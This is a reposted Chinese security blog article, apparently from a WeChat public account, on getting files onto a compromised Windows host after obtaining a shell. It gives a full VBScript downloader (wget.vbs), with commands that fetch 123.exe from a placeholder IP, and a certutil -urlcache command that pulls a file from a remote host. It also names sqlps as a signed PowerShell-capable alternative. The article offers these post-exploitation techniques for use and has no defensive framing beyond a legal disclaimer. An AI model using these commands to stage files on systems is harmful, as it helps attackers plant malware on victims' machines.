声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好“设为星标”,否则可能就看不到了啦!
0x01 前言
渗透测试时,目标主机是windows主机,拿到shell以后需要往服务器上传文件,此时可以使用两种方法。
0x02 Wget.vbs
on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2
cscript wget.vbs http://xx.xx.xx.xx/123.exe C:/xx/xx/xx/123.exe
C:/xx/xx/xx/为失陷主机的物理路径,123.exe为下载下来的名称。
0x03 certutil.exe
certutil.exe为windows服务器上自带的一个exe文件,渗透时可以利用其下载
certutil.exe -urlcache -split -f http://xx.xx.xx.xx/w.jpg
0x04 sqlps
具有powershell功能,数据库自带,具有微软签名。
点击关注下方名片进入公众号
回复关键字【脚本】下载相关脚本
文章来源:语雀(penguin-hpnyw)
原文链接:https://www.yuque.com/penguin-hpnyw
甲方安全建设|安全合规工作的简单思考与总结
记一次Web逆向攻防的实战过程
原文始发于微信公众号(李白你好):失陷Windows主机下载恶意文件的姿势
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论